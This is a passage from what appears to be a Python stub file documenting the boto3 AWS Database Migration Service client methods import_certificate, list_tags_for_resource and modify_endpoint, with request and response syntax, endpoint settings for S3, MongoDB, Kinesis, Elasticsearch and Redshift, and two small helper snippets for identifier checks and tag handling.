See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/ImportCertificate>`_
**Request Syntax**
::
response = client.import_certificate(
CertificateIdentifier='string',
CertificatePem='string',
CertificateWallet=b'bytes',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
**Response Syntax**
::
{
'Certificate': {
'CertificateIdentifier': 'string',
'CertificateCreationDate': datetime(2015, 1, 1),
'CertificatePem': 'string',
'CertificateWallet': b'bytes',
'CertificateArn': 'string',
'CertificateOwner': 'string',
'ValidFromDate': datetime(2015, 1, 1),
'ValidToDate': datetime(2015, 1, 1),
'SigningAlgorithm': 'string',
'KeyLength': 123
}
}
**Response Structure**
- *(dict) --*
- **Certificate** *(dict) --*
The certificate to be uploaded.
- **CertificateIdentifier** *(string) --*
The customer-assigned name of the certificate. Valid characters are A-z and 0-9.
- **CertificateCreationDate** *(datetime) --*
The date that the certificate was created.
- **CertificatePem** *(string) --*
The contents of the .pem X.509 certificate file for the certificate.
- **CertificateWallet** *(bytes) --*
The location of the imported Oracle Wallet certificate for use with SSL.
- **CertificateArn** *(string) --*
The Amazon Resource Name (ARN) for the certificate.
- **CertificateOwner** *(string) --*
The owner of the certificate.
- **ValidFromDate** *(datetime) --*
The beginning date that the certificate is valid.
- **ValidToDate** *(datetime) --*
The final date that the certificate is valid.
- **SigningAlgorithm** *(string) --*
The signing algorithm for the certificate.
- **KeyLength** *(integer) --*
The key length of the cryptographic algorithm being used.
:type CertificateIdentifier: string
:param CertificateIdentifier: **[REQUIRED]**
The customer-assigned name of the certificate. Valid characters are A-z and 0-9.
:type CertificatePem: string
:param CertificatePem:
The contents of the .pem X.509 certificate file for the certificate.
:type CertificateWallet: bytes
:param CertificateWallet:
The location of the imported Oracle Wallet certificate for use with SSL.
:type Tags: list
:param Tags:
The tags associated with the certificate.
- *(dict) --*
- **Key** *(string) --*
A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with \"aws:\" or \"dms:\". The string can contain only the set of Unicode letters, digits, white-space, \'_\', \'.\', \'/\', \'=\', \'+\', \'-\' (Java regex: \"^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$\").
- **Value** *(string) --*
A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with \"aws:\" or \"dms:\". The string can contain only the set of Unicode letters, digits, white-space, \'_\', \'.\', \'/\', \'=\', \'+\', \'-\' (Java regex: \"^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$\").
:rtype: dict
:returns:
"""
pass
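A quick sanity check on the certificate identifier before calling the API can catch obvious mistakes. The pattern below only illustrates the documented constraint (letters and digits; the hyphen allowance is an assumption), and is not the service's authoritative validation; the identifier and file path in the usage comment are placeholders.

```python
import re

# Sketch only: pre-check the customer-assigned certificate identifier.
# Hyphen support is an assumption, not confirmed by the constraint text.

def valid_certificate_identifier(name):
    return bool(re.fullmatch(r'[A-Za-z0-9-]+', name))

# Usage (requires AWS credentials; identifier and path are placeholders):
# import boto3
# client = boto3.client('dms')
# with open('endpoint-cert.pem') as f:
#     resp = client.import_certificate(
#         CertificateIdentifier='my-endpoint-cert',
#         CertificatePem=f.read(),
#     )
# print(resp['Certificate']['CertificateArn'])
```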
def list_tags_for_resource(self, ResourceArn: str) -> Dict:
"""
Lists all tags for an AWS DMS resource.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/ListTagsForResource>`_
**Request Syntax**
::
response = client.list_tags_for_resource(
ResourceArn='string'
)
**Response Syntax**
::
{
'TagList': [
{
'Key': 'string',
'Value': 'string'
},
]
}
**Response Structure**
- *(dict) --*
- **TagList** *(list) --*
A list of tags for the resource.
- *(dict) --*
- **Key** *(string) --*
A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with "aws:" or "dms:". The string can contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: "^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$").
- **Value** *(string) --*
A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with "aws:" or "dms:". The string can contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: "^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$").
:type ResourceArn: string
:param ResourceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) string that uniquely identifies the AWS DMS resource.
:rtype: dict
:returns:
"""
pass
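``TagList`` comes back as a list of ``{'Key': ..., 'Value': ...}`` pairs; flattening it into a plain dict is a common convenience. A minimal sketch, with a placeholder ARN in the usage comment:

```python
# Sketch only: turn the TagList response shape into a plain dict.

def tags_to_dict(tag_list):
    return {t['Key']: t['Value'] for t in tag_list}

# Usage (requires AWS credentials; the ARN is a placeholder):
# import boto3
# client = boto3.client('dms')
# resp = client.list_tags_for_resource(ResourceArn='arn:aws:dms:...:task:EXAMPLE')
# print(tags_to_dict(resp['TagList']))
```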
def modify_endpoint(self, EndpointArn: str, EndpointIdentifier: str = None, EndpointType: str = None, EngineName: str = None, Username: str = None, Password: str = None, ServerName: str = None, Port: int = None, DatabaseName: str = None, ExtraConnectionAttributes: str = None, CertificateArn: str = None, SslMode: str = None, ServiceAccessRoleArn: str = None, ExternalTableDefinition: str = None, DynamoDbSettings: Dict = None, S3Settings: Dict = None, DmsTransferSettings: Dict = None, MongoDbSettings: Dict = None, KinesisSettings: Dict = None, ElasticsearchSettings: Dict = None, RedshiftSettings: Dict = None) -> Dict:
"""
Modifies the specified endpoint.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/ModifyEndpoint>`_
**Request Syntax**
::
response = client.modify_endpoint(
EndpointArn='string',
EndpointIdentifier='string',
EndpointType='source'|'target',
EngineName='string',
Username='string',
Password='string',
ServerName='string',
Port=123,
DatabaseName='string',
ExtraConnectionAttributes='string',
CertificateArn='string',
SslMode='none'|'require'|'verify-ca'|'verify-full',
ServiceAccessRoleArn='string',
ExternalTableDefinition='string',
DynamoDbSettings={
'ServiceAccessRoleArn': 'string'
},
S3Settings={
'ServiceAccessRoleArn': 'string',
'ExternalTableDefinition': 'string',
'CsvRowDelimiter': 'string',
'CsvDelimiter': 'string',
'BucketFolder': 'string',
'BucketName': 'string',
'CompressionType': 'none'|'gzip',
'EncryptionMode': 'sse-s3'|'sse-kms',
'ServerSideEncryptionKmsKeyId': 'string',
'DataFormat': 'csv'|'parquet',
'EncodingType': 'plain'|'plain-dictionary'|'rle-dictionary',
'DictPageSizeLimit': 123,
'RowGroupLength': 123,
'DataPageSize': 123,
'ParquetVersion': 'parquet-1-0'|'parquet-2-0',
'EnableStatistics': True|False,
'CdcInsertsOnly': True|False
},
DmsTransferSettings={
'ServiceAccessRoleArn': 'string',
'BucketName': 'string'
},
MongoDbSettings={
'Username': 'string',
'Password': 'string',
'ServerName': 'string',
'Port': 123,
'DatabaseName': 'string',
'AuthType': 'no'|'password',
'AuthMechanism': 'default'|'mongodb_cr'|'scram_sha_1',
'NestingLevel': 'none'|'one',
'ExtractDocId': 'string',
'DocsToInvestigate': 'string',
'AuthSource': 'string',
'KmsKeyId': 'string'
},
KinesisSettings={
'StreamArn': 'string',
'MessageFormat': 'json',
'ServiceAccessRoleArn': 'string'
},
ElasticsearchSettings={
'ServiceAccessRoleArn': 'string',
'EndpointUri': 'string',
'FullLoadErrorPercentage': 123,
'ErrorRetryDuration': 123
},
RedshiftSettings={
'AcceptAnyDate': True|False,
'AfterConnectScript': 'string',
'BucketFolder': 'string',
'BucketName': 'string',
'ConnectionTimeout': 123,
'DatabaseName': 'string',
'DateFormat': 'string',
'EmptyAsNull': True|False,
'EncryptionMode': 'sse-s3'|'sse-kms',
'FileTransferUploadStreams': 123,
'LoadTimeout': 123,
'MaxFileSize': 123,
'Password': 'string',
'Port': 123,
'RemoveQuotes': True|False,
'ReplaceInvalidChars': 'string',
'ReplaceChars': 'string',
'ServerName': 'string',
'ServiceAccessRoleArn': 'string',
'ServerSideEncryptionKmsKeyId': 'string',
'TimeFormat': 'string',
'TrimBlanks': True|False,
'TruncateColumns': True|False,
'Username': 'string',
'WriteBufferSize': 123
}
)
**Response Syntax**
::
{
'Endpoint': {
'EndpointIdentifier': 'string',
'EndpointType': 'source'|'target',
'EngineName': 'string',
'EngineDisplayName': 'string',
'Username': 'string',
'ServerName': 'string',
'Port': 123,
'DatabaseName': 'string',
'ExtraConnectionAttributes': 'string',
'Status': 'string',
'KmsKeyId': 'string',
'EndpointArn': 'string',
'CertificateArn': 'string',
'SslMode': 'none'|'require'|'verify-ca'|'verify-full',
'ServiceAccessRoleArn': 'string',
'ExternalTableDefinition': 'string',
'ExternalId': 'string',
'DynamoDbSettings': {
'ServiceAccessRoleArn': 'string'
},
'S3Settings': {
'ServiceAccessRoleArn': 'string',
'ExternalTableDefinition': 'string',
'CsvRowDelimiter': 'string',
'CsvDelimiter': 'string',
'BucketFolder': 'string',
'BucketName': 'string',
'CompressionType': 'none'|'gzip',
'EncryptionMode': 'sse-s3'|'sse-kms',
'ServerSideEncryptionKmsKeyId': 'string',
'DataFormat': 'csv'|'parquet',
'EncodingType': 'plain'|'plain-dictionary'|'rle-dictionary',
'DictPageSizeLimit': 123,
'RowGroupLength': 123,
'DataPageSize': 123,
'ParquetVersion': 'parquet-1-0'|'parquet-2-0',
'EnableStatistics': True|False,
'CdcInsertsOnly': True|False
},
'DmsTransferSettings': {
'ServiceAccessRoleArn': 'string',
'BucketName': 'string'
},
'MongoDbSettings': {
'Username': 'string',
'Password': 'string',
'ServerName': 'string',
'Port': 123,
'DatabaseName': 'string',
'AuthType': 'no'|'password',
'AuthMechanism': 'default'|'mongodb_cr'|'scram_sha_1',
'NestingLevel': 'none'|'one',
'ExtractDocId': 'string',
'DocsToInvestigate': 'string',
'AuthSource': 'string',
'KmsKeyId': 'string'
},
'KinesisSettings': {
'StreamArn': 'string',
'MessageFormat': 'json',
'ServiceAccessRoleArn': 'string'
},
'ElasticsearchSettings': {
'ServiceAccessRoleArn': 'string',
'EndpointUri': 'string',
'FullLoadErrorPercentage': 123,
'ErrorRetryDuration': 123
},
'RedshiftSettings': {
'AcceptAnyDate': True|False,
'AfterConnectScript': 'string',
'BucketFolder': 'string',
'BucketName': 'string',
'ConnectionTimeout': 123,
'DatabaseName': 'string',
'DateFormat': 'string',
'EmptyAsNull': True|False,
'EncryptionMode': 'sse-s3'|'sse-kms',
'FileTransferUploadStreams': 123,
'LoadTimeout': 123,
'MaxFileSize': 123,
'Password': 'string',
'Port': 123,
'RemoveQuotes': True|False,
'ReplaceInvalidChars': 'string',
'ReplaceChars': 'string',
'ServerName': 'string',
'ServiceAccessRoleArn': 'string',
'ServerSideEncryptionKmsKeyId': 'string',
'TimeFormat': 'string',
'TrimBlanks': True|False,
'TruncateColumns': True|False,
'Username': 'string',
'WriteBufferSize': 123
}
}
}
**Response Structure**
- *(dict) --*
- **Endpoint** *(dict) --*
The modified endpoint.
- **EndpointIdentifier** *(string) --*
The database endpoint identifier. Identifiers must begin with a letter; must contain only ASCII letters, digits, and hyphens; and must not end with a hyphen or contain two consecutive hyphens.
- **EndpointType** *(string) --*
The type of endpoint.
- **EngineName** *(string) --*
The database engine name. Valid values, depending on the EndPointType, include mysql, oracle, postgres, mariadb, aurora, aurora-postgresql, redshift, s3, db2, azuredb, sybase, dynamodb, mongodb, and sqlserver.
- **EngineDisplayName** *(string) --*
The expanded name for the engine name. For example, if the ``EngineName`` parameter is "aurora," this value would be "Amazon Aurora MySQL."
- **Username** *(string) --*
The user name used to connect to the endpoint.
- **ServerName** *(string) --*
The name of the server at the endpoint.
- **Port** *(integer) --*
The port value used to access the endpoint.
- **DatabaseName** *(string) --*
The name of the database at the endpoint.
- **ExtraConnectionAttributes** *(string) --*
Additional connection attributes used to connect to the endpoint.
- **Status** *(string) --*
The status of the endpoint.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don't specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
- **EndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **CertificateArn** *(string) --*
The Amazon Resource Name (ARN) used for SSL connection to the endpoint.
- **SslMode** *(string) --*
The SSL mode used to connect to the endpoint.
SSL mode can be one of four values: none, require, verify-ca, verify-full.
The default value is none.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service access IAM role.
- **ExternalTableDefinition** *(string) --*
The external table definition.
- **ExternalId** *(string) --*
Value returned by a call to CreateEndpoint that can be used for cross-account validation. Use it on a subsequent call to CreateEndpoint to create the endpoint with a cross-account.
- **DynamoDbSettings** *(dict) --*
The settings for the target DynamoDB database. For more information, see the ``DynamoDBSettings`` structure.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service access IAM role.
- **S3Settings** *(dict) --*
The settings for the S3 target endpoint. For more information, see the ``S3Settings`` structure.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service access IAM role.
- **ExternalTableDefinition** *(string) --*
The external table definition.
- **CsvRowDelimiter** *(string) --*
The delimiter used to separate rows in the source files. The default is a newline (``\n`` ).
- **CsvDelimiter** *(string) --*
The delimiter used to separate columns in the source files. The default is a comma.
- **BucketFolder** *(string) --*
An optional parameter to set a folder name in the S3 bucket. If provided, tables are created in the path ``<bucketFolder>/<schema_name>/<table_name>/`` . If this parameter is not specified, then the path used is ``<schema_name>/<table_name>/`` .
- **BucketName** *(string) --*
The name of the S3 bucket.
- **CompressionType** *(string) --*
An optional parameter to use GZIP to compress the target files. Set to GZIP to compress the target files. Set to NONE (the default) or do not use to leave the files uncompressed. Applies to both CSV and PARQUET data formats.
- **EncryptionMode** *(string) --*
The type of server side encryption you want to use for your data. This is part of the endpoint settings or the extra connections attributes for Amazon S3. You can choose either ``SSE_S3`` (default) or ``SSE_KMS`` . To use ``SSE_S3`` , you need an IAM role with permission to allow ``"arn:aws:s3:::dms-*"`` to use the following actions:
* s3:CreateBucket
* s3:ListBucket
* s3:DeleteBucket
* s3:GetBucketLocation
* s3:GetObject
* s3:PutObject
* s3:DeleteObject
* s3:GetObjectVersion
* s3:GetBucketPolicy
* s3:PutBucketPolicy
* s3:DeleteBucketPolicy
- **ServerSideEncryptionKmsKeyId** *(string) --*
If you are using SSE_KMS for the ``EncryptionMode`` , provide the KMS Key ID. The key you use needs an attached policy that enables IAM user permissions and allows use of the key.
Here is a CLI example: ``aws dms create-endpoint --endpoint-identifier <value> --endpoint-type target --engine-name s3 --s3-settings ServiceAccessRoleArn=<value>,BucketFolder=<value>,BucketName=<value>,EncryptionMode=SSE_KMS,ServerSideEncryptionKmsKeyId=<value>``
- **DataFormat** *(string) --*
The format of the data which you want to use for output. You can choose one of the following:
* ``CSV`` : This is a row-based format with comma-separated values.
* ``PARQUET`` : Apache Parquet is a columnar storage format that features efficient compression and provides faster query response.
- **EncodingType** *(string) --*
The type of encoding you are using: ``RLE_DICTIONARY`` (default), ``PLAIN`` , or ``PLAIN_DICTIONARY`` .
* ``RLE_DICTIONARY`` uses a combination of bit-packing and run-length encoding to store repeated values more efficiently.
* ``PLAIN`` does not use encoding at all. Values are stored as they are.
* ``PLAIN_DICTIONARY`` builds a dictionary of the values encountered in a given column. The dictionary is stored in a dictionary page for each column chunk.
- **DictPageSizeLimit** *(integer) --*
The maximum size of an encoded dictionary page of a column. If the dictionary page exceeds this, this column is stored using an encoding type of ``PLAIN`` . Defaults to 1024 * 1024 bytes (1MiB), the maximum size of a dictionary page before it reverts to ``PLAIN`` encoding. For ``PARQUET`` format only.
- **RowGroupLength** *(integer) --*
The number of rows in a row group. A smaller row group size provides faster reads, but writes become slower as the number of row groups grows. Defaults to 10,000 (ten thousand) rows. For ``PARQUET`` format only.
If you choose a value larger than the maximum, ``RowGroupLength`` is set to the max row group length in bytes (64 * 1024 * 1024).
- **DataPageSize** *(integer) --*
The size of one data page in bytes. Defaults to 1024 * 1024 bytes (1MiB). For ``PARQUET`` format only.
- **ParquetVersion** *(string) --*
The version of Apache Parquet format you want to use: ``PARQUET_1_0`` (default) or ``PARQUET_2_0`` .
- **EnableStatistics** *(boolean) --*
Enables statistics for Parquet pages and rowGroups. Choose ``TRUE`` to enable statistics, choose ``FALSE`` to disable. Statistics include ``NULL`` , ``DISTINCT`` , ``MAX`` , and ``MIN`` values. Defaults to ``TRUE`` . For ``PARQUET`` format only.
- **CdcInsertsOnly** *(boolean) --*
Option to write only ``INSERT`` operations to the comma-separated value (CSV) output files. By default, the first field in a CSV record contains the letter ``I`` (insert), ``U`` (update) or ``D`` (delete) to indicate whether the row was inserted, updated, or deleted at the source database. If ``cdcInsertsOnly`` is set to true, then only ``INSERT`` s are recorded in the CSV file, without the ``I`` annotation on each line. Valid values are ``TRUE`` and ``FALSE`` .
- **DmsTransferSettings** *(dict) --*
The settings in JSON format for the DMS transfer type of source endpoint.
Possible attributes include the following:
* ``serviceAccessRoleArn`` - The IAM role that has permission to access the Amazon S3 bucket.
* ``bucketName`` - The name of the S3 bucket to use.
* ``compressionType`` - An optional parameter to use GZIP to compress the target files. Set this value to ``GZIP`` to compress the target files. Set it to ``NONE`` (the default) or don't use it to leave the files uncompressed.
Shorthand syntax for these attributes is as follows: ``ServiceAccessRoleArn=string,BucketName=string,CompressionType=string``
JSON syntax for these attributes is as follows: ``{ "ServiceAccessRoleArn": "string", "BucketName": "string", "CompressionType": "none"|"gzip" }``
- **ServiceAccessRoleArn** *(string) --*
The IAM role that has permission to access the Amazon S3 bucket.
- **BucketName** *(string) --*
The name of the S3 bucket to use.
- **MongoDbSettings** *(dict) --*
The settings for the MongoDB source endpoint. For more information, see the ``MongoDbSettings`` structure.
- **Username** *(string) --*
The user name you use to access the MongoDB source endpoint.
- **Password** *(string) --*
The password for the user account you use to access the MongoDB source endpoint.
- **ServerName** *(string) --*
The name of the server on the MongoDB source endpoint.
- **Port** *(integer) --*
The port value for the MongoDB source endpoint.
- **DatabaseName** *(string) --*
The database name on the MongoDB source endpoint.
- **AuthType** *(string) --*
The authentication type you use to access the MongoDB source endpoint.
Valid values: NO, PASSWORD
When NO is selected, user name and password parameters are not used and can be empty.
- **AuthMechanism** *(string) --*
The authentication mechanism you use to access the MongoDB source endpoint.
Valid values: DEFAULT, MONGODB_CR, SCRAM_SHA_1
DEFAULT – For MongoDB version 2.x, use MONGODB_CR. For MongoDB version 3.x, use SCRAM_SHA_1. This attribute is not used when authType=No.
- **NestingLevel** *(string) --*
Specifies either document or table mode.
Valid values: NONE, ONE
Default value is NONE. Specify NONE to use document mode. Specify ONE to use table mode.
- **ExtractDocId** *(string) --*
Specifies the document ID. Use this attribute when ``NestingLevel`` is set to NONE.
Default value is false.
- **DocsToInvestigate** *(string) --*
Indicates the number of documents to preview to determine the document organization. Use this attribute when ``NestingLevel`` is set to ONE.
Must be a positive value greater than 0. Default value is 1000.
- **AuthSource** *(string) --*
The MongoDB database name. This attribute is not used when ``authType=NO`` .
The default is admin.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don't specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
- **KinesisSettings** *(dict) --*
The settings for the Amazon Kinesis target endpoint. For more information, see the ``KinesisSettings`` structure.
- **StreamArn** *(string) --*
The Amazon Resource Name (ARN) for the Amazon Kinesis Data Streams endpoint.
- **MessageFormat** *(string) --*
The output format for the records created on the endpoint. The message format is ``JSON`` .
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) for the IAM role that DMS uses to write to the Amazon Kinesis data stream.
- **ElasticsearchSettings** *(dict) --*
The settings for the Elasticsearch target endpoint. For more information, see the ``ElasticsearchSettings`` structure.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service to access the IAM role.
- **EndpointUri** *(string) --*
The endpoint for the Elasticsearch cluster.
- **FullLoadErrorPercentage** *(integer) --*
The maximum percentage of records that can fail to be written before a full load operation stops.
- **ErrorRetryDuration** *(integer) --*
The maximum number of seconds that DMS retries failed API requests to the Elasticsearch cluster.
- **RedshiftSettings** *(dict) --*
Settings for the Amazon Redshift endpoint.
- **AcceptAnyDate** *(boolean) --*
Allows any date format, including invalid formats such as 00/00/00 00:00:00, to be loaded without generating an error. You can choose TRUE or FALSE (default).
This parameter applies only to TIMESTAMP and DATE columns. Always use ACCEPTANYDATE with the DATEFORMAT parameter. If the date format for the data does not match the DATEFORMAT specification, Amazon Redshift inserts a NULL value into that field.
- **AfterConnectScript** *(string) --*
Code to run after connecting. This should be the code, not a filename.
- **BucketFolder** *(string) --*
The location where the CSV files are stored before being uploaded to the S3 bucket.
- **BucketName** *(string) --*
The name of the S3 bucket you want to use.
- **ConnectionTimeout** *(integer) --*
Sets the amount of time to wait (in milliseconds) before timing out, beginning from when you initially establish a connection.
- **DatabaseName** *(string) --*
The name of the Amazon Redshift data warehouse (service) you are working with.
- **DateFormat** *(string) --*
The date format you are using. Valid values are ``auto`` (case-sensitive), your date format string enclosed in quotes, or NULL. If this is left unset (NULL), it defaults to a format of 'YYYY-MM-DD'. Using ``auto`` recognizes most strings, even some that are not supported when you use a date format string.
If your date and time values use formats different from each other, set this to ``auto`` .
- **EmptyAsNull** *(boolean) --*
Specifies whether AWS DMS should migrate empty CHAR and VARCHAR fields as NULL. A value of TRUE sets empty CHAR and VARCHAR fields to null. The default is FALSE.
- **EncryptionMode** *(string) --*
The type of server side encryption you want to use for your data. This is part of the endpoint settings or the extra connections attributes for Amazon S3. You can choose either SSE_S3 (default) or SSE_KMS. To use SSE_S3, create an IAM role with a policy that allows ``"arn:aws:s3:::*"`` to use the following actions: ``"s3:PutObject", "s3:ListBucket"`` .
- **FileTransferUploadStreams** *(integer) --*
Specifies the number of threads used to upload a single file. This accepts a value between 1 and 64. It defaults to 10.
- **LoadTimeout** *(integer) --*
Sets the amount of time to wait (in milliseconds) before timing out, beginning from when you begin loading.
- **MaxFileSize** *(integer) --*
Specifies the maximum size (in KB) of any CSV file used to transfer data to Amazon Redshift. This accepts a value between 1 and 1048576. It defaults to 32768 KB (32 MB).
- **Password** *(string) --*
The password for the user named in the username property.
- **Port** *(integer) --*
The port number for Amazon Redshift. The default value is 5439.
- **RemoveQuotes** *(boolean) --*
Removes surrounding quotation marks from strings in the incoming data. All characters within the quotation marks, including delimiters, are retained. Choose TRUE to remove quotation marks. The default is FALSE.
- **ReplaceInvalidChars** *(string) --*
A list of chars you want to replace. Use with ``ReplaceChars`` .
- **ReplaceChars** *(string) --*
Replaces invalid characters specified in ``ReplaceInvalidChars`` , substituting the specified value instead. The default is "?".
- **ServerName** *(string) --*
The name of the Amazon Redshift cluster you are using.
- **ServiceAccessRoleArn** *(string) --*
The ARN of the role that has access to the Redshift service.
- **ServerSideEncryptionKmsKeyId** *(string) --*
If you are using SSE_KMS for the ``EncryptionMode`` , provide the KMS Key ID. The key you use needs an attached policy that enables IAM user permissions and allows use of the key.
- **TimeFormat** *(string) --*
The time format you want to use. Valid values are ``auto`` (case-sensitive), 'timeformat_string', 'epochsecs', or 'epochmillisecs'. It defaults to 10. Using ``auto`` recognizes most strings, even some that are not supported when you use a time format string.
If your date and time values use formats different from each other, set this to ``auto`` .
- **TrimBlanks** *(boolean) --*
Removes the trailing white space characters from a VARCHAR string. This parameter applies only to columns with a VARCHAR data type. Choose TRUE to remove unneeded white space. The default is FALSE.
- **TruncateColumns** *(boolean) --*
Truncates data in columns to the appropriate number of characters, so that it fits in the column. Applies only to columns with a VARCHAR or CHAR data type, and rows with a size of 4 MB or less. Choose TRUE to truncate data. The default is FALSE.
- **Username** *(string) --*
An Amazon Redshift user name for a registered user.
- **WriteBufferSize** *(integer) --*
The size of the write buffer to use in rows. Valid values range from 1 to 2048. Defaults to 1024. Use this setting to tune performance.
:type EndpointArn: string
:param EndpointArn: **[REQUIRED]**
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
:type EndpointIdentifier: string
:param EndpointIdentifier:
The database endpoint identifier. Identifiers must begin with a letter; must contain only ASCII letters, digits, and hyphens; and must not end with a hyphen or contain two consecutive hyphens.
:type EndpointType: string
:param EndpointType:
The type of endpoint.
:type EngineName: string
:param EngineName:
The type of engine for the endpoint. Valid values, depending on the EndPointType, include mysql, oracle, postgres, mariadb, aurora, aurora-postgresql, redshift, s3, db2, azuredb, sybase, dynamodb, mongodb, and sqlserver.
:type Username: string
:param Username:
The user name to be used to login to the endpoint database.
:type Password: string
:param Password:
The password to be used to login to the endpoint database.
:type ServerName: string
:param ServerName:
The name of the server where the endpoint database resides.
:type Port: integer
:param Port:
The port used by the endpoint database.
:type DatabaseName: string
:param DatabaseName:
The name of the endpoint database.
:type ExtraConnectionAttributes: string
:param ExtraConnectionAttributes:
Additional attributes associated with the connection. To reset this parameter, pass the empty string (\"\") as an argument.
:type CertificateArn: string
:param CertificateArn:
The Amazon Resource Name (ARN) of the certificate used for SSL connection.
:type SslMode: string
:param SslMode:
The SSL mode to be used.
SSL mode can be one of four values: none, require, verify-ca, verify-full.
The default value is none.
:type ServiceAccessRoleArn: string
:param ServiceAccessRoleArn:
The Amazon Resource Name (ARN) for the service access role you want to use to modify the endpoint.
:type ExternalTableDefinition: string
:param ExternalTableDefinition:
The external table definition.
:type DynamoDbSettings: dict
:param DynamoDbSettings:
Settings in JSON format for the target Amazon DynamoDB endpoint. For more information about the available settings, see `Using Object Mapping to Migrate Data to DynamoDB <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Target.DynamoDB.html>`__ in the *AWS Database Migration Service User Guide.*
- **ServiceAccessRoleArn** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) used by the service access IAM role.
:type S3Settings: dict
:param S3Settings:
Settings in JSON format for the target Amazon S3 endpoint. For more information about the available settings, see `Extra Connection Attributes When Using Amazon S3 as a Target for AWS DMS <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Target.S3.html#CHAP_Target.S3.Configuring>`__ in the *AWS Database Migration Service User Guide.*
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service access IAM role.
- **ExternalTableDefinition** *(string) --*
The external table definition.
- **CsvRowDelimiter** *(string) --*
The delimiter used to separate rows in the source files. The default is a newline (``\n`` ).
- **CsvDelimiter** *(string) --*
The delimiter used to separate columns in the source files. The default is a comma.
- **BucketFolder** *(string) --*
An optional parameter to set a folder name in the S3 bucket. If provided, tables are created in the path ``<bucketFolder>/<schema_name>/<table_name>/`` . If this parameter is not specified, then the path used is ``<schema_name>/<table_name>/`` .
- **BucketName** *(string) --*
The name of the S3 bucket.
- **CompressionType** *(string) --*
An optional parameter to use GZIP to compress the target files. Set to GZIP to compress the target files. Set to NONE (the default) or do not use to leave the files uncompressed. Applies to both CSV and PARQUET data formats.
- **EncryptionMode** *(string) --*
The type of server side encryption you want to use for your data. This is part of the endpoint settings or the extra connections attributes for Amazon S3. You can choose either ``SSE_S3`` (default) or ``SSE_KMS`` . To use ``SSE_S3`` , you need an IAM role with permission to allow ``\"arn:aws:s3:::dms-*\"`` to use the following actions:
* s3:CreateBucket
* s3:ListBucket
* s3:DeleteBucket
* s3:GetBucketLocation
* s3:GetObject
* s3:PutObject
* s3:DeleteObject
* s3:GetObjectVersion
* s3:GetBucketPolicy
* s3:PutBucketPolicy
* s3:DeleteBucketPolicy
- **ServerSideEncryptionKmsKeyId** *(string) --*
If you are using SSE_KMS for the ``EncryptionMode`` , provide the KMS Key ID. The key you use needs an attached policy that enables IAM user permissions and allows use of the key.
Here is a CLI example: ``aws dms create-endpoint --endpoint-identifier <value> --endpoint-type target --engine-name s3 --s3-settings ServiceAccessRoleArn=<value>,BucketFolder=<value>,BucketName=<value>,EncryptionMode=SSE_KMS,ServerSideEncryptionKmsKeyId=<value>``
- **DataFormat** *(string) --*
The format of the data which you want to use for output. You can choose one of the following:
* ``CSV`` : This is a row-based format with comma-separated values.
* ``PARQUET`` : Apache Parquet is a columnar storage format that features efficient compression and provides faster query response.
- **EncodingType** *(string) --*
The type of encoding you are using: ``RLE_DICTIONARY`` (default), ``PLAIN`` , or ``PLAIN_DICTIONARY`` .
* ``RLE_DICTIONARY`` uses a combination of bit-packing and run-length encoding to store repeated values more efficiently.
* ``PLAIN`` does not use encoding at all. Values are stored as they are.
* ``PLAIN_DICTIONARY`` builds a dictionary of the values encountered in a given column. The dictionary is stored in a dictionary page for each column chunk.
- **DictPageSizeLimit** *(integer) --*
The maximum size of an encoded dictionary page of a column. If the dictionary page exceeds this, this column is stored using an encoding type of ``PLAIN`` . Defaults to 1024 * 1024 bytes (1MiB), the maximum size of a dictionary page before it reverts to ``PLAIN`` encoding. For ``PARQUET`` format only.
- **RowGroupLength** *(integer) --*
The number of rows in a row group. A smaller row group size provides faster reads, but as the number of row groups grows, writes become slower. Defaults to 10,000 (ten thousand) rows. For ``PARQUET`` format only.
If you choose a value larger than the maximum, ``RowGroupLength`` is set to the max row group length in bytes (64 * 1024 * 1024).
- **DataPageSize** *(integer) --*
The size of one data page in bytes. Defaults to 1024 * 1024 bytes (1MiB). For ``PARQUET`` format only.
- **ParquetVersion** *(string) --*
The version of Apache Parquet format you want to use: ``PARQUET_1_0`` (default) or ``PARQUET_2_0`` .
- **EnableStatistics** *(boolean) --*
